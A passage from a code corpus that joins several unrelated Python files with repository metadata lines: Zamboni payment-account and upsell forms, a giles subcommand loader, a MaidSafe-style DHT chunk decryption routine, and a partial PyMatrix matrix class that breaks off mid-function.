        self.addon.save()
class UpsellForm(happyforms.Form):
    """Form linking a paid app to the free app it is an upgrade of."""
    upsell_of = AddonChoiceField(
        queryset=Webapp.objects.none(), required=False,
        label=_lazy(u'This is a paid upgrade of'),
        empty_label=_lazy(u'Not an upgrade'))

    def __init__(self, *args, **kw):
        self.addon = kw.pop('addon')
        self.user = kw.pop('user')
        kw.setdefault('initial', {})
        if self.addon.upsold:
            kw['initial']['upsell_of'] = self.addon.upsold.free
        super(UpsellForm, self).__init__(*args, **kw)
        # Only offer the user's own free (non-deleted) apps as candidates.
        self.fields['upsell_of'].queryset = (
            self.user.addons.exclude(pk=self.addon.pk,
                                     status=mkt.STATUS_DELETED)
            .filter(premium_type__in=mkt.ADDON_FREES))

    def save(self):
        """Create, repoint or delete the AddonUpsell relation as selected."""
        current_upsell = self.addon.upsold
        new_upsell_app = self.cleaned_data.get('upsell_of')
        if new_upsell_app:
            # We're changing the upsell or creating a new one.
            if not current_upsell:
                # If the upsell is new or we just deleted the old upsell,
                # create a new upsell.
                log.debug('[1@%s] Creating app upsell' % self.addon.pk)
                current_upsell = AddonUpsell(premium=self.addon)
            # Set the upsell object to point to the app that we're upselling.
            current_upsell.free = new_upsell_app
            current_upsell.save()
        elif current_upsell:
            # We're deleting the upsell.
            log.debug('[1@%s] Deleting the app upsell' % self.addon.pk)
            current_upsell.delete()
class BangoPaymentAccountForm(happyforms.Form):
    """Form for creating/updating a Bango payment account.

    Field names intentionally match the Bango API's camelCase parameters.
    When editing an existing account the bank-detail fields (see
    ``read_only_fields``) become optional because Bango treats them as
    write-once.
    """
    bankAccountPayeeName = forms.CharField(
        max_length=50, label=_lazy(u'Bank Account Holder Name'))
    companyName = forms.CharField(
        max_length=255, label=_lazy(u'Company Name'))
    vendorName = forms.CharField(
        max_length=255, label=_lazy(u'Vendor Name'))
    financeEmailAddress = forms.EmailField(
        required=True, label=_lazy(u'Financial Email'),
        max_length=100)
    adminEmailAddress = forms.EmailField(
        required=True, label=_lazy(u'Administrative Email'),
        max_length=100)
    supportEmailAddress = forms.EmailField(
        required=True, label=_lazy(u'Support Email'),
        max_length=100)
    address1 = forms.CharField(
        max_length=255, label=_lazy(u'Address'))
    address2 = forms.CharField(
        max_length=255, required=False, label=_lazy(u'Address 2'))
    addressCity = forms.CharField(
        max_length=128, label=_lazy(u'City/Municipality'))
    addressState = forms.CharField(
        max_length=64, label=_lazy(u'State/Province/Region'))
    addressZipCode = forms.CharField(
        max_length=10, label=_lazy(u'Zip/Postal Code'))
    addressPhone = forms.CharField(
        max_length=20, label=_lazy(u'Phone'))
    countryIso = forms.ChoiceField(
        choices=BANGO_COUNTRIES, label=_lazy(u'Country'))
    currencyIso = forms.ChoiceField(
        choices=BANGO_OUTPAYMENT_CURRENCIES,
        label=_lazy(u'I prefer to be paid in'))
    vatNumber = forms.CharField(
        max_length=17, required=False, label=_lazy(u'VAT Number'))
    bankAccountNumber = forms.CharField(
        max_length=20, label=_lazy(u'Bank Account Number'))
    bankAccountCode = forms.CharField(
        # l10n: SWIFT is http://bit.ly/15e7RJx and might not need translating.
        max_length=20, label=_lazy(u'SWIFT code'))
    bankName = forms.CharField(
        max_length=50, label=_lazy(u'Bank Name'))
    bankAddress1 = forms.CharField(
        max_length=50, label=_lazy(u'Bank Address'))
    bankAddress2 = forms.CharField(
        max_length=50, required=False, label=_lazy(u'Bank Address 2'))
    bankAddressCity = forms.CharField(
        max_length=50, required=False, label=_lazy(u'Bank City/Municipality'))
    bankAddressState = forms.CharField(
        max_length=50, required=False,
        label=_lazy(u'Bank State/Province/Region'))
    bankAddressZipCode = forms.CharField(
        max_length=10, label=_lazy(u'Bank Zip/Postal Code'))
    bankAddressIso = forms.ChoiceField(
        choices=BANGO_COUNTRIES, label=_lazy(u'Bank Country'))
    account_name = forms.CharField(max_length=64, label=_lazy(u'Account Name'))
    # These are the fields that Bango uses for bank details. They're read-only
    # once written.
    read_only_fields = set(['bankAccountPayeeName', 'bankAccountNumber',
                            'bankAccountCode', 'bankName', 'bankAddress1',
                            'bankAddressZipCode', 'bankAddressIso',
                            'adminEmailAddress', 'currencyIso',
                            'companyName'])

    def __init__(self, *args, **kwargs):
        self.account = kwargs.pop('account', None)
        super(BangoPaymentAccountForm, self).__init__(*args, **kwargs)
        if self.account:
            # We don't need the bank account fields if we're getting
            # modifications.
            for field in self.fields:
                if field in self.read_only_fields:
                    self.fields[field].required = False

    def save(self):
        # Save the account name, if it was updated.
        self.account.get_provider().account_update(self.account,
                                                   self.cleaned_data)
class AccountListForm(happyforms.Form):
    """Form to pick (or change) the payment account used by an app for a
    single payment provider."""
    accounts = forms.ModelChoiceField(
        queryset=PaymentAccount.objects.none(),
        label=_lazy(u'Payment Account'), required=False)

    def __init__(self, *args, **kwargs):
        self.addon = kwargs.pop('addon')
        self.provider = kwargs.pop('provider')
        self.user = kwargs.pop('user')
        super(AccountListForm, self).__init__(*args, **kwargs)
        self.is_owner = None
        if self.addon:
            # Only the app's owner may change payment accounts.
            self.is_owner = self.addon.authors.filter(
                pk=self.user.pk,
                addonuser__role=mkt.AUTHOR_ROLE_OWNER).exists()
        self.fields['accounts'].queryset = self.agreed_payment_accounts
        if self.is_owner is False:
            self.fields['accounts'].widget.attrs['disabled'] = ''
        self.current_payment_account = None
        try:
            current_acct = AddonPaymentAccount.objects.get(
                addon=self.addon,
                payment_account__provider=self.provider.provider)
            payment_account = PaymentAccount.objects.get(
                uri=current_acct.account_uri)
            # If this user owns this account then set initial otherwise
            # we'll stash it on the form so we can display the non-owned
            # current account separately.
            if payment_account.user.pk == self.user.pk:
                self.initial['accounts'] = payment_account
                self.fields['accounts'].empty_label = None
            else:
                self.current_payment_account = payment_account
        except (AddonPaymentAccount.DoesNotExist, PaymentAccount.DoesNotExist):
            pass

    @property
    def payment_accounts(self):
        """Active accounts visible to this user: their own plus shared ones."""
        queryset = (PaymentAccount.objects
                    .filter(inactive=False)
                    .filter(Q(user=self.user) | Q(shared=True))
                    .order_by('name', 'shared'))
        if self.provider is not None:
            queryset = queryset.filter(provider=self.provider.provider)
        return queryset

    @property
    def agreed_payment_accounts(self):
        # Accounts whose owner accepted the provider's terms of service.
        return self.payment_accounts.filter(agreed_tos=True)

    def has_accounts(self):
        return self.payment_accounts.exists()

    def has_completed_accounts(self):
        return self.agreed_payment_accounts.exists()

    def clean_accounts(self):
        accounts = self.cleaned_data.get('accounts')
        # When cleaned if the accounts field wasn't submitted or it's an empty
        # string the cleaned value will be None for a ModelChoiceField.
        # Therefore to tell the difference between the non-submission and the
        # empty string we need to check the raw data.
        accounts_submitted = 'accounts' in self.data
        if (AddonPaymentAccount.objects.filter(addon=self.addon).exists() and
                accounts_submitted and not accounts):
            raise forms.ValidationError(
                _('You cannot remove a payment account from an app.'))
        if accounts and not self.is_owner:
            raise forms.ValidationError(
                _('You are not permitted to change payment accounts.'))
        return accounts

    def save(self):
        """Replace the app's account for this provider and, when relevant,
        flag the app for re-review / restore its status."""
        if self.cleaned_data.get('accounts'):
            try:
                log.info('[1@%s] Attempting to delete app payment account'
                         % self.addon.pk)
                AddonPaymentAccount.objects.get(
                    addon=self.addon,
                    payment_account__provider=self.provider.provider
                ).delete()
            except AddonPaymentAccount.DoesNotExist:
                log.info('[1@%s] Deleting failed, this is usually fine'
                         % self.addon.pk)
            log.info('[1@%s] Creating new app payment account' % self.addon.pk)
            account = self.cleaned_data['accounts']
            uri = self.provider.product_create(account, self.addon)
            AddonPaymentAccount.objects.create(
                addon=self.addon, account_uri=account.uri,
                payment_account=account, product_uri=uri)
            # If the app is marked as paid and the information is complete
            # and the app is currently marked as incomplete, put it into the
            # re-review queue.
            if (self.addon.status == mkt.STATUS_NULL and
                    self.addon.highest_status
                    in mkt.WEBAPPS_APPROVED_STATUSES):
                # FIXME: This might cause noise in the future if bank accounts
                # get manually closed by Bango and we mark apps as STATUS_NULL
                # until a new account is selected. That will trigger a
                # re-review.
                log.info(u'[Webapp:%s] (Re-review) Public app, premium type '
                         u'upgraded.' % self.addon)
                RereviewQueue.flag(
                    self.addon, mkt.LOG.REREVIEW_PREMIUM_TYPE_UPGRADE)
            if (self.addon.has_incomplete_status() and
                    self.addon.is_fully_complete()):
                _restore_app_status(self.addon)
class AccountListBaseFormSet(BaseFormSet):
    """Base FormSet for AccountListForm. Provide the extra data for the
    AccountListForm as a list in `provider_data`.

    Example:

        formset = AccountListFormSet(provider_data=[
            {'provider': Bango()}, {'provider': Boku()}])
    """

    def __init__(self, **kwargs):
        # Strip our private kwarg before BaseFormSet sees it.
        self.provider_data = kwargs.pop('provider_data', [])
        super(AccountListBaseFormSet, self).__init__(**kwargs)

    def _construct_form(self, i, **kwargs):
        # Use the i-th provider_data entry (if any) as the base kwargs for
        # the i-th form, letting explicit kwargs override it.  Note the
        # stored dict itself is updated, matching the original behaviour.
        form_kwargs = (self.provider_data[i]
                       if i < len(self.provider_data) else {})
        form_kwargs.update(kwargs)
        return (super(AccountListBaseFormSet, self)
                ._construct_form(i, **form_kwargs))

    def save(self):
        # Delegate saving to every member form.
        for member in self.forms:
            member.save()
# Wrap the formset_factory call in a function so that extra/max_num works with
# different values of settings.PAYMENT_PROVIDERS in the tests.
def AccountListFormSet(*args, **kwargs):
    """Instantiate a formset with one AccountListForm per configured payment
    provider (extra/max_num track settings.PAYMENT_PROVIDERS at call time,
    which lets tests override it)."""
    n_providers = len(settings.PAYMENT_PROVIDERS)
    formset_cls = formset_factory(AccountListForm,
                                  formset=AccountListBaseFormSet,
                                  extra=n_providers,
                                  max_num=n_providers)
    return formset_cls(*args, **kwargs)
class ReferenceAccountForm(happyforms.Form):
    """Minimal account form for the reference payment provider."""
    uuid = forms.CharField(max_length=36, required=False,
                           widget=forms.HiddenInput())
    account_name = forms.CharField(max_length=50, label=_lazy(u'Account name'))
    name = forms.CharField(max_length=50, label=_lazy(u'Name'))
    email = forms.EmailField(max_length=100, label=_lazy(u'Email'))

    def __init__(self, *args, **kwargs):
        # Optional existing account being edited.
        self.account = kwargs.pop('account', None)
        super(ReferenceAccountForm, self).__init__(*args, **kwargs)

    def save(self):
        # Save the account name, if it was updated.
        provider = self.account.get_provider()
        provider.account_update(self.account, self.cleaned_data)
class BokuAccountForm(happyforms.Form):
    """Account form for the Boku payment provider."""
    signup_url = settings.BOKU_SIGNUP_URL
    account_name = forms.CharField(max_length=50, label=_lazy(u'Account name'))
    # The lengths of these are not specified in the Boku documentation, so
    # making a guess here about max lengths.
    service_id = forms.CharField(max_length=50, label=_lazy(u'Service ID'))

    def clean_service_id(self):
        """Check the service id against Boku via the payment server."""
        service_id = self.cleaned_data['service_id']
        try:
            client.api.boku.verify_service.post({'service_id': service_id})
        except HttpClientError:
            raise ValidationError(_('Service ID is not valid'))
        else:
            return service_id
class PaymentCheckForm(happyforms.Form):
    """Form validating that a paid app (by slug) has a payment account."""
    app = SluggableModelChoiceField(
        queryset=Webapp.objects.filter(
            premium_type__in=mkt.ADDON_HAS_PAYMENTS),
        sluggable_to_field_name='app_slug')

    def clean_app(self):
        app = self.cleaned_data['app']
        if not app.has_payment_account():
            raise ValidationError(_('No payment account set up for that app'))
        return app
|
clouserw/zamboni
|
mkt/developers/forms_payments.py
|
Python
|
bsd-3-clause
| 26,284
|
from __future__ import unicode_literals, print_function, absolute_import
from giles.utils import load_subcommands
# Import each bundled command group so its subcommands self-register.
for _group in ('giles', 'jira', 'github'):
    load_subcommands('giles.commands.' + _group)
|
anthonyalmarza/giles
|
giles/commands/__init__.py
|
Python
|
mit
| 203
|
# -*- coding: utf-8 -*-
from Crypto.Cipher import AES
from shaGeneration import *
from tools import *
import pickle
from os import remove
import pdb
#pdb.set_trace()
from twisted.internet import reactor, task
from twisted.python import log
from kademlia.network import Server
def grepChunks(result, i, j, server, splitedHashes, encrypedHashes, inputHash, chunkSize):
    """Twisted callback: write the chunk-part just fetched from the DHT,
    then chain a get() for the next part.

    (i, j) index the current encrypted chunk and the current part within
    it; when every chunk has been written the reactor is stopped and
    maidSafeDecrypt is re-entered with grepNotDone=False to do the actual
    decryption.  NOTE: Python 2 print statements throughout.
    """
    #pdb.set_trace()
    # Write result from previous query
    fn1 = encrypedHashes[i]
    # TODO : Check if not none
    if debug == 'normal': print ' Getting (i,j) > ' + str(i) + ', ' + str(j)
    # Create new file if new chunk. Append otherwise.
    if (j == 0):
        fc = open(('scrambled/' + fn1), 'wb')
        fc.write(result)
        fc.close()
    else:
        fc = open(('scrambled/' + fn1), 'ab')
        fc.write(result)
        fc.close()
    # Increment for next query
    if( (len(splitedHashes[i])-1) != j ):
        j += 1
    else:
        i += 1
        j = 0
    # Got all the chunks, return back to decryption scheme
    if i == len(encrypedHashes) :
        reactor.stop()
        if debug != 'none': print ' Chunks downloaded from DHT!'
        if debug != 'none': print ' Decrypting...'
        maidSafeDecrypt(inputHash, chunkSize, server, grepNotDone=False)
        return
    # Get the next chunk
    fn1 = splitedHashes[i][j]
    server.get(fn1).addCallback(grepChunks, i, j, server, splitedHashes, encrypedHashes, inputHash, chunkSize)
def maidSafeDecryptSetDebug(inputHash, chunkSize, server, debu, grepNotDone=True, iterations=1000, xor=False):
    """Set the module-wide debug level, then start decryption.

    Bug fix: the grepNotDone / iterations / xor arguments were previously
    accepted but discarded -- the call to maidSafeDecrypt re-passed the
    hard-coded defaults. They are now forwarded, so callers can actually
    tune the key-derivation iteration count or enable the XOR layer.
    """
    global debug
    debug = debu
    if debug != 'none': print(' Downloading chunks from DHT...')
    maidSafeDecrypt(inputHash, chunkSize, server, grepNotDone=grepNotDone,
                    iterations=iterations, xor=xor)
def maidSafeDecrypt(inputHash, chunkSize, server, grepNotDone=True, iterations=1000, xor=False):
    """Reassemble and decrypt a file from its MaidSafe-style chunks.

    First pass (grepNotDone=True) kicks off asynchronous DHT fetches and
    returns; grepChunks re-enters with grepNotDone=False once every chunk
    is on disk, at which point each chunk is (optionally un-XORed and)
    AES-CFB decrypted with a key derived from a rolling window of three
    chunk hashes, and appended to reconstructed/<filename>.
    NOTE: Python 2 print statements and hex-codec usage throughout.
    """
    # Getting back the objects:
    with open(inputHash, 'rb') as f:
        shas, encHashes, splitedHashes = pickle.load(f)
    # Get filename
    filename = inputHash.replace('.hashes', '')
    # Erase file if already existing...
    fc = open(('reconstructed/' + filename), 'w')
    fc.write('')
    fc.close()
    noOfChunks = len(shas)
    # Grep chunks if not done before. Return and let callback do the job
    if (grepNotDone):
        server.get(splitedHashes[0][0]).addCallback(grepChunks, 0, 0, server, splitedHashes, encHashes, inputHash, chunkSize)
        return
    # Resolve file from chunks
    for i in range(0, noOfChunks):
        # Get first item to decipher. First hash in the list and so on
        fn1 = encHashes[i]
        fc = open(('scrambled/' + fn1), 'rb')
        scrambledData = fc.read()
        fc.close()
        remove('scrambled/' + fn1)
        # Get data and create chunk #
        chunkNumer = i
        # Pick right hash...
        # The key for chunk i derives from the two "previous" chunk hashes,
        # wrapping around the end of the list for the first two chunks.
        if(chunkNumer == 0):
            shaOne = shas[noOfChunks-1]
            shaTwo = shas[noOfChunks-2]
            shaThree = shas[chunkNumer]
        elif(chunkNumer == 1):
            shaOne = shas[noOfChunks-1]
            shaTwo = shas[chunkNumer-1]
            shaThree = shas[chunkNumer]
        else:
            shaOne = shas[chunkNumer-2]
            shaTwo = shas[chunkNumer-1]
            shaThree = shas[chunkNumer]
        # Need massive key deriv to xor out of AES
        if xor: keyDerivOut = keyDeriv(shaOne, shaTwo, shaThree, len(scrambledData.decode('hex')), iterations)
        else : keyDerivOut = keyDeriv(shaOne, shaTwo, shaThree, 48, iterations)
        # Unxor if needed
        if xor: unXored = strxor(scrambledData,keyDerivOut.decode("hex"))
        else: unXored = scrambledData
        # Setup cipher with key = first half[:32] of pbkdf2, and IV = second part[:16]
        cipher = AES.new(keyDerivOut[:64].decode('hex'), AES.MODE_CFB, keyDerivOut[64:(64+32)].decode('hex'))
        # Encrypt
        outCipher = (cipher.decrypt(unXored))
        # Append decrypted data to file...
        fc = open(('reconstructed/' + filename), 'ab')
        fc.write(outCipher)
        fc.close()
        if debug == 'normal': print ' Chunk...'
    if debug != 'none': print '\n File successfully downloaded ! It should be in reconstructed/'
|
pldubouilh/maidsafe
|
decrypt.py
|
Python
|
gpl-2.0
| 4,044
|
from __future__ import division
# -*- coding: utf-8 -*-
'''
Created on 18 Sep, 2014
PyMatrix implementation based on pure python oop charisma
Description:
@author : WANG LEI / YI, Research Associate @ NTU
@emial: L.WANG@ntu.edu.sg, Nanyang Technologcial University
@licence: licence
'''
__all__ = ["matrixArrayLists", "matrixArrayNum", "matrixArray"]
from time import time as Time
DEBUG_TIME_ELAPSE = False
# this function for elapse time measurement
# from core.framework.middleware import *
def timmer(func):
    """Decorator that reports the wall-clock time of each call.

    The timing line is printed only when the module flag DEBUG_TIME_ELAPSE
    is true; the wrapped function's return value is passed through
    unchanged.  Fix: functools.wraps is now applied so the wrapper keeps
    the wrapped function's __name__/__doc__ (previously every decorated
    function reported itself as 'wrapper').
    """
    from functools import wraps

    @wraps(func)
    def wrapper(*args, **keywords):
        # start time
        start = Time()
        # original call
        result = func(*args, **keywords)
        # end time
        elapse = Time() - start
        if DEBUG_TIME_ELAPSE:
            print(func.__name__, ':\n\tconsumed ', '{0:<2.6f}'.format(elapse), ' seconds')
        return result
    return wrapper
# helper class for iteration over empty elements
class Null():
    """Sentinel used to pad ragged matrix rows.

    Prints as '*', counts as a single element, and absorbs any arithmetic:
    combining a Null with anything yields a fresh Null.
    """

    def __init__(self, *args, **hints):
        # Accept (and ignore) any construction arguments.
        pass

    def __len__(self):
        return 1

    def __str__(self):
        return '*'

    def __repr__(self):
        return 'nullObect'

    def _absorb(self, other):
        # Any arithmetic involving a Null degenerates to a new Null.
        return Null()

    __add__ = __radd__ = _absorb
    __sub__ = __rsub__ = _absorb
    __mul__ = __rmul__ = _absorb
#===========================================================================
# n-d matrix size discriptor: when it is 2-d or 1-d, it reduces to {row, col} form
#===========================================================================
class Size(object):
    """Shape descriptor for an n-d matrix.

    Backed by a plain sequence (or a mapping keyed by 'row'/'col'); in the
    1-d/2-d case the first two entries are exposed as ``row`` and ``col``.
    Also usable as a class-level descriptor: instance access rebuilds the
    shape from the owner's ``_get_shape_array()``.

    Fixes vs. the original:
    * ``__get__`` recursed into itself unconditionally when accessed on the
      class (``caller is None``), causing infinite recursion; it now
      returns the descriptor itself.
    * ``__init__`` used a shared mutable default (``data=[]``) that
      ``append`` mutated across all default-constructed instances.
    * ``count`` computed ``self.data.count(item)`` but discarded it and
      returned the backing list; it now returns the count.
    """

    def __init__(self, data=None):
        # ``None`` sentinel instead of a shared mutable default list.
        self.data = [] if data is None else data

    def __iter__(self):
        return iter(self.data)

    def __get__(self, caller, callerType):
        # Class-level access returns the descriptor itself (the original
        # called self.__get__ again here -- infinite recursion).
        if caller is None:
            return self
        # Instance access: rebuild the shape from the owner instance.
        return self.__class__(caller._get_shape_array())

    def __getitem__(self, key):
        try:
            return self.data[key]
        except Exception:
            # Probing a dimension that does not exist reads as 0.
            return 0

    def __setitem__(self, key, val):
        self.data[key] = val

    def __getattribute__(self, name):
        try:
            return object.__getattribute__(self, name)
        except AttributeError:
            if name in ('row', 'col'):
                try:
                    # Mapping-backed shape: keyed directly by name.
                    return self.data[name]
                except Exception:
                    # Sequence-backed shape: row -> index 0, col -> index 1.
                    return self.data[{'row': 0, 'col': 1}[name]]
            raise Exception("no such attribute")

    def __len__(self):
        if not self.data:
            return 0
        return len(self.data)

    def __str__(self):
        return str(len(self.data)) + ':' + str(self.data) + '\n'

    def count(self, item):
        """Return how many times *item* occurs in the shape."""
        return self.data.count(item)

    def append(self, item):
        """Append a dimension; returns the backing list (original contract)."""
        self.data.append(item)
        return self.data

    def assert_equal(self, size):
        # do implementation here (placeholder, unimplemented)
        return self, size, True

    def assert_tolerate(self, size):
        # do implementation here (placeholder, unimplemented)
        return self, size, True
# for matrix values, we just have two types, numeric and non-numeric classes
#===========================================================================
# n-d matrix formatter discriptor
#===========================================================================
from math import floor
class Formatter(object):
    """Per-element string formatter for matrix printing.

    Holds a list of format templates (numeric, string, fallback) plus
    per-column width data.  ``fire``/``__call__`` stashes the element's
    (row, col) position, then ``__getattribute__`` lazily resolves
    ``width``/``float`` from that position -- so ``width`` is only
    meaningful during a fire() call.  Also acts as a descriptor: instance
    access rebuilds a Formatter from the owner's size and
    ``_init_formatter()``.
    """

    def __init__(self, size=None, data = {'width':[2], 'float':2}, description= ['{0:<{width}.{float}f} ', '{0:<{width}s} ', '{0:<{width}s} ']):
        # NOTE(review): mutable defaults are shared across instances here;
        # appears tolerated because register() only extends `templates`.
        self.templates = []
        self.templates.extend(description)
        self.data = data
        self.size = size

    def __get__(self, caller, callerType):
        if caller == None:
            return \
            self
        else:
            # Instance access: derive formatting data from the owner matrix.
            return Formatter(caller.size, caller._init_formatter())

    def __getitem__(self, _id):
        # Index into the registered templates.
        return self.templates[_id]

    def __getattribute__(self, name):
        try:
            return object.__getattribute__(self, name)
        except:
            if name == 'width':
                # get stored position
                a, b = self.position
                width = self.data[name]
                # get width for the element in column b; the last cell of
                # the matrix gets -float (trims trailing padding).
                try:
                    return -self.float if a == self.size.row - 1 and b == self.size.col - 1 else width[b]# len(c), len(c[a])
                except Exception as e:
                    print(e)
            if name == 'float':
                return self.data[name]

    def register(self, template):
        """Add an extra format template."""
        self.templates.append(template)

    # used to decorate element
    # format(element) -> new string
    def fire(self, element, a, b):
        """Format *element* at matrix position (a, b); falls back from the
        numeric template to the string templates on Value/TypeError."""
        # store the value
        self.position = (a, b)
        element = str(element)
        # return processed string
        try:
            return self[0].format(element,
                                  width=self.width + self.float,
                                  float=self.float)
        except ValueError:
            return self[1].format(element.__str__(),
                                  width=self.width + self.float)
        except TypeError:
            return self[2].format(element.__str__(),
                                  width=self.width + self.float)
    __call__ = fire
from copy import deepcopy
# helper function
def index_len(key, l):
    """Return, per axis, how many positions *key* selects.

    *key* may be an int, list, slice, tuple of those, or any scalar; *l* is
    the shape (a list of axis lengths, or an int for a single axis).
    """
    if isinstance(key, tuple):
        # multi-axis key: consume one axis length per component
        remaining = deepcopy(l)
        lengths = []
        for part in key:
            axis_len = remaining.pop(0) if len(remaining) > 0 else 0
            lengths.append(index_len(part, axis_len)[0])
        return tuple(lengths)
    if isinstance(key, int):
        return (1,)
    if isinstance(key, list):
        return (len(key),)
    if isinstance(key, slice):
        bound = l if isinstance(l, int) else l[0]
        start, stop, step = key.indices(bound)
        return (len(range(start, stop, step)),)
    # any other scalar (e.g. a header name) selects a single position
    return (1,)
# helper function
def index_val(key, l):
    """Normalize *key* into per-axis lists of concrete indices.

    Ints become one-element lists, slices expand against the axis length,
    lists pass through, tuples recurse per axis; other scalars (e.g. header
    names) are wrapped untouched for later translation.
    """
    if isinstance(key, tuple):
        # multi-axis key: resolve each component against its own axis length
        remaining = deepcopy(l)
        resolved = []
        for part in key:
            axis_len = remaining.pop(0) if len(remaining) > 0 else 0
            resolved.append(index_val(part, axis_len)[0])
        return tuple(resolved)
    if isinstance(key, int):
        return ([key],)
    if isinstance(key, list):
        return (key,)
    if isinstance(key, slice):
        bound = l if isinstance(l, int) else l[0]
        start, stop, step = key.indices(bound)
        return (list(range(start, stop, step)),)
    return ([key],)
def edit(level, position, _list, Array):
    """Blank out an unresolved label slot in a key list.

    Row-axis slots (level 0) are set to None when x labels are enabled;
    column-axis slots (level 1) are deliberately left untouched.
    """
    if level == 0 and Array.x_label_enabled:
        _list[level][position] = None
    if level == 1 and Array.y_label_enabled:
        # intentionally a no-op (kept from the original implementation)
        pass
# this implementation has been deprecated,
# but later used to enhance core function ba
# this implementation has been deprecated,
# but later used to enhance core function ba
def index_map(func):
    """Decorator: truncate the index list fed to *func* at the first index
    that falls outside the target sequence *l*."""
    def wrpper(self, _id, l):
        limit = len(l)
        clipped = []
        for idx in _id:
            # stop (not skip) at the first out-of-range index
            if idx >= limit:
                break
            clipped.append(idx)
        return func(self, clipped, l)
    return wrpper
# this function might be changed in the future
# (1) if it found in column index,
# if key is of single value, replace it with '[:, map_kay(column_ref)]', and 'reference_name' -> headers
# (2) if it found in row index,
# if key is of single value, replace it with '[map_key(row_ref), :]', and 'row_ref' -> indice
# (3) store indice and headers in children selected
# keywords mapping
# this function might be changed in the future
# (1) if it found in column index,
# if key is of single value, replace it with '[:, map_kay(column_ref)]', and 'reference_name' -> headers
# (2) if it found in row index,
# if key is of single value, replace it with '[map_key(row_ref), :]', and 'row_ref' -> indice
# (3) store indice and headers in children selected
# keywords mapping
def map_key(func):
    """Decorator around __getitem__: when R-mode is on, translate label keys
    (header/index names) into positional indices before delegating, and carry
    the matched labels over onto the returned child matrix."""
    def wrpper(self, key):
        size = self._get_shape_array()
        # middleware preprocessing (hint is computed for symmetry with
        # __setitem__ but not used here)
        hint = index_len(key, size)
        # middleware preprocessing
        key = index_val(key, size)
        # get inner representation of the query object
        root = self.get_runtime_list()
        # plain positional mode: pass straight through
        if self.R is False:
            return func(self, key)
        # do R like preprocessing: scan the first two axes for label keys
        _list = [id for id in key]
        headers = []; indice = []
        for a, id in enumerate(_list[0:2]):
            for b, idx in enumerate(id):  # id is not str
                result, axis = \
                    self.isIndexHeader(idx)
                if axis == 1:
                    headers.append(idx)
                if axis == 0:
                    indice.append(idx)
                if result is not None:
                    id[b] = result  # legal: label replaced by its position
                if axis is None:
                    # unresolved slot: blank it (see edit()) and move on
                    edit(a, b, _list, self)
                    continue
            # drop the slots blanked out above
            _list[a] = list(filter(lambda x: x is not None, id))
        # delegate to the wrapped accessor with the translated key
        child = func(self, tuple(_list))
        # post processing: re-attach the matched labels to the child
        # (best-effort — child may be a scalar/Null without these methods)
        try:
            child.setIndice(indice)
            child.setheader(headers)
        except:
            pass
        return child
    return wrpper
def loopprocess(func):
    """Decorator: short-circuit *func* with the cached [r, c] pair when both
    row and column counts are already known on the instance."""
    def wrapper(self):
        rows, cols = self.r, self.c
        if rows is None or cols is None:
            # no complete cached shape -> fall through to the computation
            return func(self)
        return [rows, cols]
    return wrapper
def checkKey(name, default, _dict):
    """Return ``_dict[name]``, or *default* when the key is absent.

    Used by matrixArrayLists._init_hint to merge user-supplied **hint
    options over the class defaults.  try/except (EAFP) is kept rather than
    dict.get so any mapping-like object raising KeyError works.
    """
    try:
        return _dict[name]
    except KeyError:
        return default
class matrixArrayLists(list):
    '''
    Created on 17 Nov, 2014
    @author: wang yi/Lei, Researcher Associate @ EIRAN, Nanyang Technological University
    @email: L.WANG@ntu.edu.sg
    @copyright: 2014 www.yiak.co. All rights reserved.
    @license: license
    @decription: N-Matrix container for objects of any type. It then could be 2 or demensions numeric matrix for computation
    @param:
    '''
    # descriptor initialization: `size` recomputes the shape on each access;
    # `formatter` builds per-column width data for pretty printing
    size = Size()
    formatter = Formatter()
    # options, configuration context (defaults for _init_hint)
    Init_hint_options = { 'r': None, 'c': None, 'debug' : False, 'modifed_to_row_col': False , 'ori_mem': None, 'R':False, 'row_indexList':[], 'col_indexList':[],
                          'Indice' : [], 'Headers': [],}
    Init_matrix_options = { 'width' : 2, 'float' : 2,}

    def __init__(self, *args, **hint):
        """Build a matrix from (n), (r, c), (list), (r, list) or
        (dims..., iterables...) argument shapes; **hint carries options."""
        # initialization of hint data
        # because representation in 2 dimensions, r(row), c(col) are needed. It should be modified by descriptor which will compute r, c whenever an instance call it.
        self._init_hint(hint)
        numberOfargs = len(args)
        # no inputting arguments
        if numberOfargs == 0:
            if hint == {}: pass
            # no hints
            elif hint != {}:
                # set up empty matrix
                # To do:
                # initialization
                super(matrixArrayLists, self).__init__([
                ])
        elif numberOfargs == 1:
            # create a square null matrix. 2-D version
            if isinstance(args[0], int):
                super(matrixArrayLists, self).__init__()
                # specify n * n null matrix, done
                self.nil(args[0], args[0], Null())
            # create a matrix based on one inputting list
            elif isinstance(args[0], list):
                # copy or convert
                super(matrixArrayLists, self).__init__()
                # this works for matrix
                self.setUp( args[0], self.r, self.c, self.ori_mem )
        elif numberOfargs == 2:
            # two integers are specified
            if isinstance(args[0], int) and isinstance(args[1], int ):
                super(matrixArrayLists, self).__init__()
                # specify m * n null matrix
                self.nil(args[0], args[1], Null())
                # speed up techniques
                self.r = args[0]
                self.c = args[1]
            # combination of integer and list inputtings
            elif isinstance(args[0], int) and isinstance(args[1], list):
                super(matrixArrayLists, self).__init__()
                # To do: specify m * n null matrix
                self.nil(args[0], args[0], Null())
                self.setUp( args[1], args[0], self.c, self.ori_mem)
        elif numberOfargs > 2:
            # find the first non-int argument: leading ints are dimensions,
            # trailing iterables are fill data
            for i in range( 0, len(args) ):
                if not isinstance(args[i], int):
                    break
            if i == 0 and isinstance(args[ 0 ], list):
                # To do: matrix cantenation
                super(matrixArrayLists, self).__init__()
                # To do: union
            if i != 0 and isinstance(args[ i ], list):
                # To do: specify, filling missing data by other iteratables
                super(matrixArrayLists, self).__init__()
                self.nil_multi(*args[0:i])
                # fillup
                self.fillUp(*args[i:])

    def _init_hint(self, hint):
        """Install every option from Init_hint_options (overridden by *hint*)
        as an instance attribute."""
        for name, default in self.Init_hint_options.items():
            # set local variables
            # NOTE(review): exec interpolates the value's str(); works for the
            # None/bool/list defaults used here but would break on plain
            # strings — confirm hint values are always literal-safe
            exec("self.%s = %s" % (name, checkKey(name, default, hint)))

    def _init_matrix_formatter(self, _float=2, _width=2, formatter=None):
        """Compute per-column display widths from the current contents
        (headers included in R mode); returns Formatter's data dict."""
        for name, default in self.Init_matrix_options.items():
            # set local variables
            exec("self.%s = %s" % (name, default))
        size = self.size
        col_length = 0
        width_list = []
        inner_list = self.get_runtime_list()
        if self.R is True:
            inner_list.extend(self.Headers)
        for j in range(size[1]):
            col_length = self.width
            for i in range(size[0]):
                try:
